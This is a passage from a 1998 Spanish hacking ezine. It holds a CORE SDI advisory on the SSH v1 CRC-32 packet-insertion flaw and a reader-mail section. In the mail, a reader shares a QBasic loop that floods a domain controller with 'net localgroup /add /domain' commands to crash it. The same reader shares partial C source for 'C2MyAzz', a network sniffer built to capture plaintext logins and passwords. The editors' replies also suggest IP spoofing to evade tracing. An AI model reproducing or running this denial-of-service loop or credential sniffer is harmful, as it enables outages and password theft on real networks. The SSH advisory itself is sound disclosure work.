    sino en la maquina remota, necesitamos el "caracter escape" que se nos
    dia al conectar para pasar al "modo comando" ( habitualmente teclas
    control + parentesis derecho ).

  Comandos disponibles:

  CLOSE Termina la conexion TELNET con la maquina remota y vuelve al
        "modo comando" (si empezamos alli) o sale de TELNET.
  QUIT  Sale del programa TELNET; si estas conectado a una maquina
        remota, QUIT te desconecta y luego sale de TELNET.
  SET ECHO Si no ves lo que estas escribiendo, o si escribes y ves doble,
           este comando soluciona el problema.
  OPEN Abre una conexion a una maquina remota.

        ATENCION: Al presionar las teclas Enter o Return, sales del modo
  comando TELNET y vuelves a la sesion TELNET. te dejo aqui, investiga y
  juega con telnet, no es muy dificil y pronto aprenderas a usarlo de una
  manera mas "productiva".

  FTP-MS2

        si entras en Ms2 y en el promp pones "ftp" te saldra esto "ftp>"
  ahora parasaber los comandos que puedes usar pon "?" y te saldra una lista
  de los comandos que puedes usar en el programa, juega con ellos y prueba
  cosas 

  9.PROXImamente....

        pues la verdad es que no se que voy a incluir, si tienes algo que
  comentar o quieres mandarme cosas nuevas ya sabes mandamelas a
  zed@mixmail.com y sera incluido en la proxima actualizacion

  bye--:) 

<>

<>

                             CORE SDI S.A.
                        Buenos Aires, Argentina
                       <http://www.core-sdi.com>

                       Advertencia de Seguridad
                          11 de Junio de 1998

                       Ataque de insercion a SSH
					   

  Esta advertencia trata sobre un problema de seguridad presente
  en el paquete de software SSH que permite a un atacante ejecutar
  comandos arbitrarios en el servidor SSH o, de manera mas general,
  insertar datos arbitrarios en un canal SSH encriptado.


  Descripcion del problema
  ~~~~~~~~~~~~~~~~~~~~~~~~
  SSH (Secure Shell) es un programa que proporciona autenticacion
  fuerte y comunicaciones seguras sobre canales inseguros.
  Es ampliamente usado para sesiones interactivas remotas, transferencia
  de archivos y encapsulado de otros protocolos en un tunel 
  sobre un canal de comunicacions encriptado.
  Todas las comunicaciones son encriptadas automaticamente y
  de manera transparente.
  La encripcion es tambien utilizada para realizar chequeo de la
  integridad de los datos, sin embargo implementaciones actuales
  se basan en un Chequeo Ciclico de Redundancia de 32 bits (CRC-32)
  para verificar la integridad despues de la desencripcion de un
  paquete SSH recibido.

  La encripcion se realiza utilizando uno de los algoritmos soportados
  tanto por el cliente como el servidor.
  Una vez establecida una conexion entre cliente y servidor, ambos
  realizan un protocolo de negociacion que  incluye autenticacion
  mutua, eleccion de un algoritmo criptografico a utilizar e
  intercambio de una clave de sesion a utilizar con dicho algoritmo.
  Terminada la negociacion se activa la encripcion, todo comunicacion
  subsiguiente esta encriptada.

  Los algoritmos de encripcion soportados por la version actual de SSH son:

  - Blowfish
    Encriptor de bloque de Bruce Schneier con clave de 128 bits.
  - IDEA
    Encriptor de bloque con clave de 128 bits.
  - DES
    Data Encrryption Standard, encriptor de bloque con clave de 56 bits 
  - Triple DES (3DES)
    Version triple de DES con tres claves para un total efectivo
    de 112 bits de clave.
  - ARCFOUR
    Encriptor de canal compatible con RC4 con clave 128 bits

   El uso de estos algoritmos en modo CBC (Cipher Block Chaining)
   o CFB ( Cipher FeedBack 64 bits) en conjuncion con CRC-32 para
   realizar chequeo de integridad posibilita  un ataque de
   texto conocido (known plaintext attack) con tan solo
   16 bytes de texto conocido (8 para el caso de IDEA en modo
   CFB) que permite a un atacante insertar paquetes encriptados
   en el canal de comunicacion entre cliente y servidor que 
   pasaran las pruebas de integridad y se desencriptaran a
   el texto en claro enviado. De esta manera, un atacante
   podra ejecutar comandos arbitrarios en el servidor.
   El mismo ataque puede realizarse sobre el cliente, aunque
   solo hace posible el envio de datos arbitrarios a la terminal
   del cliente. Las implicacias de un ataque al cliente son
   tal vez no tan como un ataque al servidor pero aun asi deben
   ser consideradas durante el proceso de solucion del problema.
   
  Detalles tecnicos
  ~~~~~~~~~~~~~~~~~
   Despues de la fase de identificacion del protocolo, donde
   el servidor envia un string de texto en claro especificando
   su version de protocolo y de software, toda la comunicacion se
   realiza encapsulando los datos en un formato de paquetes descripto
   como "The Binary Packet Protocol" [1]
   
   Se indica dicho formato a continuacion:

              32         24        16         8         0
               +----------+---------+---------+---------+
               |        data length (bytes)             |
               +----------+---------+---------+---------+
               |    de 1 a 8 bytes de relleno           |
               =            ( padding )                 = 
               +----------+---------+---------+---------+
               |   type   |                             |
               +----------+                             +
               |                                        |
               =                 data                   =
               |                                        |
               +----------+---------+---------+---------+
               |                CRC-32                  |
               +----------+---------+---------+---------+

   Data length: Tamanio en bytes del paquete, sin incluir
                el campo 'length' y los bytes de relleno.
   Padding    : 8 - (length mod 8) byte de datos aleatorios.
                El uso de datos aleatorios al principio del
                paquete es un inteto por hacer mas dificiles
                ataques de texto en claro conocido 
                (known plaintext attacks)
   
   Packet type: Un byte sin signo de 8 bits
   Data       : length - 5 bytes de datos
   CRC-32     : 4 bytes para el chequeo de integridad.
                El CRC se calcula antes de realizar
                la encripcion.
			 
  La encripcion se realiza sobre los campos 'padding', 'type',
  'data' y 'CRC', el campo 'length' nunca se encripta. La parte
  encriptada del paquete tiene un tamanio que es siempre multiplo
  de 8 bytes.

  Conociendo ciertas caracteristicas de los modos de encripcion
  utilizados (CBC por ejemplo), con un texto en claaro conocido, un
  atacante puede construir un paquete SSH propio ( del tipo
  SSH_CMSG_STDIN_DATA) con los bytes de relleno calculados
  de tal manera que los siguientes 8 bytes del paquete se 
  desencriptaran a un texto en claro a eleccion del atacante.
  En este caso en particular, los bytes desencriptados corresponderan
  al campo 'type' y 7 bytes de datos.
  Despues de esto 16 bytes (relleno+tipo+7 bytes de datos) el 
  atacante debe incluir una cantidad variable de bytes calculados
  con el proposito especifico de producir un CRC-32 valido para todo
  el paquete una ves que el mismo es desencriptado.

  Este ataque y variaciones utilizando la misma tecnica puede realizarse
  debido al uso de un esquema de verificacion de integridad que
  es inherentemente debil. En particular CRC-32 posse ciertas
  propiedades que permiten al atacante generar un paquete con
  datos arbitrario y aun asi obtener un valor de CRC que es valido.

  Por supuesto que para que este ataque sea exitoso el atacante
  debe tener acceso al canal encriptado entre cliente y servidor,
  ya sea realizando un ataque activo de red, interponiendose
  entre cliente y servidor a nivel de aplicacion SSH o realizando
  un ataque de toma de sesion TCP. 
  Un ataque de este ultimo tipo se describe en [6] y para
  el caso de SSH los dos metodos de de-sincronizacion de
  TCP mencionados pueden ser utilizados. 
  Especificamente, el metodo descripto como "Null data
  desynchronization" puede realizarse utilizando paquetes
  SSH de tipo SSH_CMSG_IGNORE.

  Es importante senalar que la nueva revision del protocolo
  SSH, propuesta y publicada como Internet Drafts [2], [3], [4]
  y [5] hace uso de codigos de autenticacion de mensajes (MACs)
  criptograficamente fuerte y no suceptibles a este ataque.

  Aun cuando se hallan encontrado problemas en el protocolo 
  SSH, es todavia una alternativa mucho mas segura que el uso de
  las aplicaciones telnet, rsh y rlogin.
  
  [1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen
       Helsinki University of Technology. November 15th 1995
	   (draft expired on May 15th, 1996)

	   Included as the file ./RFC in the ssh distribution
	   <http://www.cs.hut.fi/ssh>

  [2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz
       T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 

  [3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz
       T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 

  [4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz
       T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 

  [5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz
       T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 
   
	   (drafts expired on May 7th, 1998)

  Todos los Internet Drafts estan disponibles en:
  <ftp://ftp.isi.edu/internet-drafts/>

  [6] "Simple Active Attack Against TCP", Laurent Joncheray, 
      Merit Networks Inc., 5th USENIX Security Simposium. 1995.

  Impacto:
  ~~~~~~~~
   Un atacante con acceso al canal SSH encriptado puede 
   insertar bloque en el canal que se desencriptaran
   a text en claro de su eleccion pusibilitando la ejecucion
   de cualquier comando en el servidor SSH.

  Informacion para solucionar el problema
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   Haga un upgrade a la version 2 del protocolo SSH, 
   disponible al publico en los proximos dias.

   Usuarios de la version comercial F-Secure SSH deben
   contactar a Data Fellows Inc. para informacion
   sobre como realizar el upgrade a F-Secure SSH 2.0

   Note que la version 2 del protocolo NO es compatible
   con las versiones anteriors y por lo tanto tambien
   necesitara hacer un upgrade de los clientes SSH.
   
   Mientras tanto puede realizar un upgrade a la version
   1.2.25 de SSH, que soluciona el problema. 
   La distribucion 1.2.25 puede obtenerse de:
   
    <ftp://ftp.cs.hut.fi/pub/ssh/ssh-1.2.25.tar.gz>

   La version 1.3.5 de F-Secure SSH soluciona este problema.
   Si Ud. usa el paquete comercial Data Fellows SSH y tiene un
   contrato de soporte puede obtener F-Secure SSH de su
   distribuidor local.
   Usuarios sin contrato de soporte pueden obterner un patch
   que soluciona el problema de:

   <http://www.DataFellows.com/f-secure/support/ssh/bug/su134patch.html>

   Adicionalmente, puede obtener un patch para la distribucion
   libre SSH 1.2.23 y el paquete complete con el patch instalado
   de:

    <http://www.core-sdi.com/ssh>

   A continuacion se incluyen los hashes MD5 de los archivos
   correspondientes

   MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310
   MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869
   MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab

  Sistemas vulnerables:
  ~~~~~~~~~~~~~~~~~~~~
   Todos los sistemas utilizando implementacions de la version 1.x
   de SSH son vulnerables. Esto incluye versiones de software hasta
   la 1.2.23 y F-Secure SSH 1.3.4

   Para determinar que version de SSH esta corriendo su servidor
   utilice los siguientes comandos:

   $ telnet <direccion IP del servidor> 22
   Trying <direccion IP del servidor>...
   Connected to <direccion IP del servidor>.
   Escape character is '^]'.
   SSH-1.5-1.2.23
       \ / \--------- version de software
        |------------ version del protocolo

   ^]
   telnet> close
   Connection closed.
   $ exit
     
  Informacion adicional
  ~~~~~~~~~~~~~~~~~~~~~
   Este problema fue descubierto por Ariel Futoransky
   <futo@core-sdi.com> y Emiliano Kargieman <ek@core-sdi.com>

   CORE SDI agradece a Tatu Ylonen <ylo@ssh.fi> y Tero Kivinen 
   <kivinen@ssh.fi>, quienes realizan el mantenimiento de SSH, por
   su pronta respuesta a los problemas descriptos en esta 
   advertencia de seguridad.
 
   La informacion para la solucion del problema en los
   productos F-Secure de Data Fellows Inc. fue proporcionada
   por  Olli Voima <olli.voima@DataFellows.com>

   Preguntas y comentarios con respecto a esta advertencia
   de seguridad pueden ser enviados a:

	Ariel Futoransky <futo@core-sdi.com> 
	Emiliano Kargieman <ek@core-sdi.com>

  Para mayor informacion sobre CORE SDI S.A. puede contactar a
  <core@core-sdi.com> o visitar <http://www.core-sdi.com>

  Si desea contactar a CORE puede utilizar la siguiente clave
  publica de PGP:

  Type Bits/KeyID    Date       User ID
  pub  1024/CF4E0CF5 1998/05/18 CORELABS <corelabs@core-sdi.com>

  -----BEGIN PGP PUBLIC KEY BLOCK-----
  Version: 2.6.3ia
  Comment: Requires PGP version 2.6 or later.

  mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio
  DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5
  tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR
  tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5
  z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x
  i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G
  3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh
  =ulRg
  -----END PGP PUBLIC KEY BLOCK-----

  Copyright Notice:
  ~~~~~~~~~~~~~~~~~
  El contenido de esta advertencia de seguridad es Copyright (C)
  1998 de CORE SDI S.A. y puede ser distribuido libremente
  siempre y cuando se haga en forma gratuita y se otorgue el 
  credito apropiado a los autores originales.

  $Id: ssh-advisory.txt.esp,v 1.7 1998/06/11 22:05:03 iarce Exp $

<>

<>

                             Ŀ
                            <  EL LECTOR OPINA  >
                             

        Esta seccion esta funcionando muy bien por lo visto, pero parece
  mentira que incluso en el 6 numero, haya lectores que nos escriban al
  buzon de Hotmail (el cual ya NO es valido) y por otro lado que algunos
  nos envieis mail's preguntado sobre clases o incluso cosas mucho mas
  tontas. Lo recomendable es que penseis antes de enviarnos un mail.

        Es una lastima que todavia esta seccion no haya alcanzado el
  dinamismo que nosotros pretendiamos, pero seguiremos en nuestra cruzada de
  intentarlo, algun lector si que se esfuerza en ayudar como podreis
  comprobar mas abajo, por eso a todos esos muchas gracias. Y ahora a
  divertirse :)

<>

  Date:  Sat, 25 Jul 1998 07:37:13 GMT
  From:  Manuel-el oso <sambam@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  guia irc  

  hola conde, 
  que tal? 
  acabo de leer tu guhirc..... 
  esta genial. Enhorabuena! 

  Si puedes me gustaria que me contestaras 
  a algunas preguntitas: 

  Que herramienta hay para "dormir 
  mi PC portatil" y que al despertar 
  este justo en el mismo punto 
  donde lo deje? 

  Como puedo desensamblar un 
  binario ejecutable para linux? 

  existe winzip (o similar) 
  para linux? 

  que newsreader utilizas? 
  que newsgroups frecuentas? 

  muchas gracias 

  Manu 

  PD: aupa JJF! 

  ,-. __ .-,
  --;`. ' `.' "Guantanamera....Guajira guantanamera..." 
  / ( ^__^ ) Zzzzz!! ftp.giga.or.at/pub/hacker/Incoming/spv001.zip 
  ; `(_`'_)' \ Skate or die! - Madrid 107.4 FM 
  ' ` .`--'_, ; 
  ~~`-..._)))(((.' sambam@xxxxxxxxxxxxxx 

  <------>

  [ Pues thx por los cumplidos :) Sobre los portatiles, es que eso ya lo
    hacen, mira la caracteristicas del tuyo. Sobre Linux mira el cursillo que
    encontraras en este numero y sobre winzip para Linux, yo no conozco.
    Nunca suelo pasar por las news. ] 

<>
 
  Date:  Tue, 14 Jul 1998 09:23:23 GMT  
  From:  jaina7@xxxxxxxxxxxxxx (grieko)      
  To:  conde_vampiro@usa.net  
 
  conde estas ahi? 
  que paso bueno te escribo pues para tener a alguien que oriente en mis
  dudas espero respuesta ok sabes algo de novell? 
  ok 

  <------>

  [ Como ya hemos dicho muchas veces no damos clases privadas, nuestro consejo
    es que leas este ezine. Sobre novell pillate el FAQ DE NOVELL.

    http://www2.s-gimb.lj.edus.si/natan/stuff2.html
    http://www.nmrc.org ]

<>
 
  Date:  Tue, 07 Jul 1998 13:51:20 GMT  
  From:  "Miguel Soto" <msoto@xxxxxxxxxxxxxx>      
 
  Acabo de conocer vuestra pagina a traves de la revista Jump y creo que
  aparte de un buen diseo tiene mucho contenido que leere poco a poco.
  Espero que no desaparezca vuestra direccion, como otras de vuestro style,
  si esto ocurriese o para cualquier otra cuestion mi e-mail es
  rbellamy@xxxxxxxxxxxxxx , soy cuasiinformatico de carrera osease como aquel
  que tiene un primo en Alcala que ni es primo ni es na.
 
  Estoy en el ordenador de un amigo asi que espero que no le echeis mucha
  cuenta al remitente.
    
  Saludos de un Sevillano fan de la informatica y de comun acuerdo con
  vuestra filosofia. Roberto.

  <------>

  [  En la revista Jump ?, es la primera noticia que tengo que salimos alli,
    espero que hayan sido buenas criticas :) Nosotros no pensamos desaparecer
    si no todo lo contrario nos expandimos, o sea que no te preocupes y
    siempre estaremos por Inet. ]

<>

  From:  Split <split@xxxxxxxxxxxxxx>
  To:  conde_vampiro@usa.net  
  Subject:  Peticion de un documento txt  
 
  Holas, vuelvo a escribiros ya que no he recibido respuesta. 
  Os pedia un documento titulado "La Superguia del Hacker" por Nobody 
  (hackear desde win95). 
  Ya que he estado buscando este doc pero no he podido encontrarlo, puesto 
  que hablaron de el en el n 4 de su ezine, en concreto referente a un 
  mail :))) 
  Sin mas y dandote las gracias 
  Split 

  <------>

  [ Garantizado para el n7 y encima la Version Deluxe :) ]

<>

  Date:  Wed, 10 Jun 1998 02:16:55 GMT
  From:  "Angel torrez" <mosqueteros_69@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Ayuda Urgente  
 
  Estimado conde Vampiro permitame saludarle y desearle una feliz noche 
  (por que me imagino como es usted vampiro solo saldra por las noches) 
  bueno como introduccion quiero decirle muchas gracias por todos sus 
  escritos nos han servido de mucho, tambien ese texto de hack de una Web 
  estaba muy bien, pero nosotros somos un grupo de personas de Nicaragua 
  que estamos iniciando en este maravilloso mundo del hackers, por lo cual 
  nosotros pedimos su ayuda para que nos guie en esta dificil tarea, 
  seremos sus aprendices, es cierto que una de las reglas es no preguntar 
  por que supuestamente lo sabemos todo, pero hemos roto esa regla para 
  abocarnos a usted conde para que nos ensee a dar unas que otras 
  mordidas en la net, para iniciar tenemos una pequea duda, cuando 
  nosotros nos conectamos por telnet al servidor xxxxx este servidor no 
  capta nuestro numero de IP, por lo cual ya nos pueden agarrar, esa es 
  nuestra primera pregunta. 
  Espero que no la mires tan TONTA. 

  <------>

  [ Pues como siempre decimos lee nuestros ezines y documentos :) No entiendo
    bien tu pregunta, supongo que te refieres a que el server pilla tu IP
    y quieres saber como evitar eso, pues tienes muchas maneras, IP-SPOOFING
    es una de ellas y ahora piensa un poco tu :)
    No existen las preguntas tontas si no preguntas mal formuladas en todo
    caso ;-) ]

<>
 
  Date:  Fri, 31 Jul 1998 16:00:33 GMT  
  From:  <Akira2o0o@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  ............  
 
  .............ninguno de tus links de phreak sirven pues e querido bajar 
  algunos programas y me sale con que no lo encuentra......que paso pues.... 
  hay mandame un E-mail cuando las pongan a funcionar...K..... 

  <------>

  [ Ya decimos que actualizamos los link's lo mas rapido posible pero el
    web es muy dinamico, por tanto complicado estar a la ultima. ]

<>

  From:  "Miguel Celis" <fliacelis@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  saludos desde colombia  

  mis felicitaciones por esa excelente y enviciante pagina.
  quisiera comunicarte una inquietud que tengo; fijate como solo estoy 
  incursionando al tema de los phreaker y como tengo ese interes tan 
  imenso por conocer lo que esconde en sus entraas este nuevo (para mi 
  por lo menos) mundo quisiera que pusieras mas archivos de textos 
  refiriendose a este tema ya sea informacion general o especifica. 
  Si haces caso a mi peticion, eres tu muy amable. 

  saludos a tus compaeros hackers, crackers, phreakers y todo lo que se 
  invenmten nuevo que termine en "kers". 

  se despide !el 11! 

  <------>

  [ Pues thx, ya hemos publicado algo de phreak y tienes muchas cosas en
    nuestro web, por lo que recomiendo que te pases por la seccion PHREAK. ]

<>

  From:  Nain <nii97068@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  pregunta  
 
  hola, 
  acabo de descubrir vuestra revista y me la quiero bajar... todos los n 
  para leerla tranquilamente, sin embargo tengo un problema, siempre que 
  intento bajarmela, nunca esta completa... siempre las frases estan cortadas 
  por la mitad. que puedo hacer para solucionar esto? 
  Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de 
  leerla. 

  Un saludo.udo. 

  <------>

  [ Pues ya hemos puesto un zip con el primer volumen entero y no pinches
    encima del ezine si no que clickea con el mouse y dale al boton derecho
    para salvar el fichero :) ]

<>

  From:  "A.A.A" <claw@xxxxxxxxxxxxxx>
  Subject:  intereses  

  Quisiera saber porque mas de la mitad de lugares que poneis en vuestras
  listas no estan disponibles. Os los han cerrado o censurado o simplemente
  no teneis esa informacion.
  Vais a seguir publicando mas i-zine en vuestra web?
  Podrias mandarme direcciones de paginas web para principiantes al hacking,
  phreaking, y virus ya me cuesta encontrar paginas completas da igual que
  esten en ingles.

  <------>

  [ Ya hemos dicho que es dificil el asunto de los links.  Quien dice que
    no vamos a publicar mas ?? Y mas cosas que estamos haciendo ;-)
    Para ver webs pasate por la seccion LINKS ]

<>

  From:  Daniel R. <zago@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  Pregunta  
 
  Hola acabo de visitar su pagina y me parecio que es una de las mejores que
  he visto pero tengo una pregunta que hacerles: 

  Quisiera poder conseguir el username y el pasword de una pagina 
  (www.anacam.com). Pude bajar "john the ripper vl.4" desde su pagina pero no 
  puedo instalarlo, hay un archivo de nombre "install" pero no le entiendo
  como puedo hacerle para poder arrancar el programa. Me podrian ayudar a
  instalar este programa ho recomendarme uno mas facil de usar. 
  DE antemano Muchas Gracias 
  ATTE. 
  Daniel R. 

  <------>

  [ Thx pero NO nos dedicamos a hackear webs a peticion de los lectores.
    Pasate por nuestra seccion CRACK y pillate el John, pues es raro porque
    se instala bien, vuelve a probar y leete la ayuda :) ]

<>

  From:  Nombre y apellidos <xxxxxxxx@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  subscribe  

  He intentado bajarme los Zines pero se corta a medio, podeis
  comprimirlos todos en un zip y enviarmelos a jmt1@xxxxxxxxxxxxxx 
  Gracias. 

  <------>

  [ No podemos enviarlos a todos los lectores, ya hemos puesto el primer
    volumen en zip y unos cuantos mails arriba explicamos como lo tienes
    que poder bajar correctamente. ]

<>
 
  From:  Elena <prophet@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  {CyBoRg} Continuacion respuesta  
 
  Bueno sigo con la respuesta a DANY, por aki tengo un programilla 
  en qbasic que es un DoS, te lo pongo para que veas, este DoS lo 
  que hace es que empieza a crear grupos locales en un PDC. Asi 
  que en un rato de na el PDC esta saturado de grupos y se llena 
  el HD y se queda colgao, (me he pasao explicando lo que hace) 

------------ Codigo Fuente ---------------------------------------------------

DIM var AS INTEGER 
DIM hack1 AS STRING 
DIM hack2 AS STRING 
DO WHILE var < 10000000 
var = var + 1 
hack1 = "hack" + LTRIM$(STR$ (var)) 
hack2 = "net localgroup " + hack1 + " /add /domain" 
SHELL hack2 
LOOP 

------------ FIN -------------------------------------------------------------

  Bueno, ya si que os dejo de una vez, joder que calor........... 

  {CyBoRg} 
  SHG Security Group 

  <------>

  [ Pues muchas gracias por ayudar con esta seccion :) ]

<>

  From:  Elena <prophet@xxxxxxxxxxxxxx>
  To:  jjf_team@usa.net  
  Subject:  {CyBoRg} - SHG Security -  
 
  Hi, de nuevo, os envio este mensaje para responder a "DANY" que 
  preguntaba sobre troyanos para NT en visual basic o pascal, le 
  digo que es muy dificil encontrar algo en estos lenguajes, a no 
  ser que lo hagas tu. Nosotros hemos llegado a hacer un 
  programilla de seguridad para NT en visual para chapar cosas del 
  registro, aunque lo del regedit es un coazo y mas si se lo 
  haces a alguien remotamente :))). 

  Bueno aqui te pongo el fuente de un programa para capturar pass 
  en texto plano es en C, pero bueno, haber si encuentro otro 
  troyano que tenia, lo he perdido entre todas las cosas que tengo 
  y si lo encuentro lo envio luego. 

------------ Codigo Fuente ---------------------------------------------------

/* 
C2MyAzz - Sirve para capturar login y pass en texto plano 

*/ 
#include <dos.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#pragma pack(1) 

#include "c2myazz.h" 

#define MAXENTRIES 20 

// Function prototypes 

void _loadds _far CntrlEntryPt (); 
void _loadds _far RxISR (); 
u8 stuffit(IPpac _far *, PID _far *, u8 _far *); 
void _loadds _far TXCompleteESR(); 
void init(); 
void _loadds _far grabit(); 


// Global data 
void (_far * LSLInitEntryPt)(); //ptr to func that returns a ptr 
InfoBlock LSLInfoBlock; // LSL Info block - 2 ptrs 
RxNode Rnode; 
u16 BoardNum; 
ODIStat Rtn; 
void (_far * LSLProtocolSupportEntryPt)(); // ptr LSL funct 
void (_far * LSLGenServicesEntryPt )(); 
void (_far * MLIDSupportEntryPt)(); 
void (_far * MLIDControlEntryPt)(); 
u8 _far * signature; 
union REGS regsin; 
union REGS regsout; 
struct SREGS segs; 
configtbl cfgtab; 
stattbl stattab; 
EventCB XmitECB=3d{0}; 
u8 immAddr[6]; 
EventCB _far * ECB; 
LookAhead _far * LkAhead; 
IPpac _far * pacptr; 
u16 CurEntry =3d 0; // index for big buffer 
IPInfo Data [MAXENTRIES]; // big buffer for captured data 
u16 DataEnd; 
u8 sendOK; 
u8 getpkt; 
EventCB _far * RcvECB; 

//************************************************************************* 
// 
// Build CntrlEntryPt as required by LSL. 
// upon entry: 
// bx =3d function number (0-8) 
// cx =3d parameter as required by bx 
// es:si =3d ptr as required by bx 
// upon exit: 
// ax =3d completion code ( 0 =3d successful) 
// es:si =3d as required by bx 
// registers DS BP ES SI SS SP preserved 
// 
//******************************************************************* 

void _loadds _far CntrlEntryPt () 
{ 
_asm 
{ 
mov ax, 0 ; preset AX to success 

test bx, 0 
je getcfg 

test bx, 1 
je getstat 

test bx, 2 
je LSLbind 

test bx, 3 
je unbind 

test bx, 4 
je dereg 

test bx, 5 
je promis 

test bx, 6 
je reserve 

test bx, 7 
je reserve 

test bx, 8 
je manage 

jmp error 

getcfg: 
mov ax, SEG cfgtab 
mov es,ax 
mov ax,0 
mov si, OFFSET cfgtab 
jmp goback 

getstat: 
mov ax,SEG stattab 
mov es,ax 
mov ax,0 
mov si, OFFSET stattab 
jmp goback 

LSLbind: 
mov ax, 08009h 
jmp goback 

unbind: 
jmp goback 

dereg: 
jmp goback 

promis: 
jmp goback 

reserve: 
jmp error 

manage: 
jmp goback 

error: 
mov ax, 08008h ; bad command 
jmp goback 

goback: 

} 
} 

//***************************************************************** 
// 
// Rx ISR - called by LSL 
// 
// Grabs the lookahead buffer from LSL and passes it to Stuffit 
// If the packet is of intereset, call LSL and get an ECB from 
// LSL's pool, sends to grabit 
// 
// 
//****************************************************************** 

#pragma check_stack(off) 

void _loadds _far RxISR () 
{ 
_asm 
{ 
mov word ptr LkAhead, di 
pop ax ; get callers ds into ax 
push ax 
mov word ptr LkAhead+2, ax 
push di 
push si 
push es 

} 
// Check to see if we want this packet 
getpkt=3d(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID, 
&(LkAhead->MediaHdr[6]))); 

if(getpkt =3d=3d 0) 
_asm 
{ 
pop es 
pop si 
pop di 
mov ax, 8001h ; pass to next scanner 
or ax, ax ; set ZF based on value of AX 
} 
else 
{ 
_asm 
{ 
mov bx,0 ;Get an ECB from LSL's pool 
call far ptr LSLProtocolSupportEntryPt 
mov word ptr[RcvECB],si 
mov word ptr[RcvECB+2],es 
} 

// Fill out the necessary fields in the ECB 

RcvECB->BoardNum=3d0; 
RcvECB->ProtocolID[0]=3d0; 
RcvECB->ProtocolID[1]=3d0; 
RcvECB->ProtocolID[2]=3d0; 
RcvECB->ProtocolID[3]=3d0; 
RcvECB->ProtocolID[4]=3d8; 
RcvECB->ProtocolID[5]=3d0; 
RcvECB->ProtocolNum=3d0xABCD; 
RcvECB->DataLen=3d1480; 
RcvECB->Frag1Len=3d1480; 
RcvECB->FragCnt=3d1; 
RcvECB->ECBISR=3dgrabit; 
RcvECB->Frag1Addr=3d((u8 far *)((void far 
*)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2)); 

_asm 
{ 
add sp,4 
mov word ptr ss:[bp-4],si 
xor ax, ax ;clear AX and reset ZF 
pop di 
} 
} 
} 

//************************************************************* 
// Init - checks for supporting software and hardware 
// 
//************************************************************* 

void init() 
{ 
u16 i; 
u16 ComCode; 

//***************************************************************** 
// Initialization routines 
// Check to see if LSL is loaded (int vector 2F is viable) 

regsin.x.ax =3d 0x352f; 

intdosx ( sin, sout, &segs); 

if (((regsout.x.bx | segs.es ) =3d=3d 0) || ((regsout.x.bx & segs.es ) 
=3d=3d -1)) 
{ 
printf ("C2MyAzz: LSL not loaded. Exiting.\n "); 
exit; 
} 

// Locate the LSL intial entry pt. Note that we're scanning 
// for TSRs, starting at C0 to FF. 

for ( i =3d 0xC0; i < 0xFF; i ++) 
{ 
regsin.h.ah =3d i; 
regsin.h.al =3d 0; 

int86x (0x2F, sin, sout, &segs); 

if ( regsout.h.al =3d=3d 0xFF) // something is installed, check it 
{ 
(long)signature =3d (long)regsout.x.si ; // ptr to LSL id 
(long)signature =3d ((long)segs.es << 16) | (long)signature; 

if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8)) // 
check for LSL id 
continue; // not LSL, continue 
else 
{ 
(long)LSLInitEntryPt =3d (long)regsout.x.bx ; 
(long)LSLInitEntryPt =3d (long)LSLInitEntryPt | 
((long)regsout.x.dx << 16); 
break; // got LSL exit loop 
} 
} 
} 

if (!LSLInitEntryPt) 
{ 
printf ("C2MyAzz: LSL is not loaded \n "); 
exit; 
} 

LSLInfoBlock.LSLAPI =3d 0; 

// call the LSL initial entry pt to fill in the LSL info block 

_asm 
{ 
push es 
push ds 
mov ax, SEG LSLInfoBlock 
mov es, ax 
mov si, OFFSET LSLInfoBlock ; ES:SI =3d ptr to info block 
mov bx, 4 ; bx =3d req code 4 
call far ptr LSLInitEntryPt ; get LSL info block 
pop ds 
pop es 
} 

// move function ptrs from info block (optional) 

LSLProtocolSupportEntryPt =3d (void (_far *)())LSLInfoBlock.LSLAPI; 
LSLGenServicesEntryPt =3d (void (_far *)())LSLInfoBlock.GSAPI; 
MLIDSupportEntryPt =3d (void (_far *)())LSLInfoBlock.MLIDAPI; 
// Assume that we're only dealing with one board 
BoardNum =3d 0; 

// Get MLID Control Entry point for later use 

_asm 
{ 
push es 
push ds 
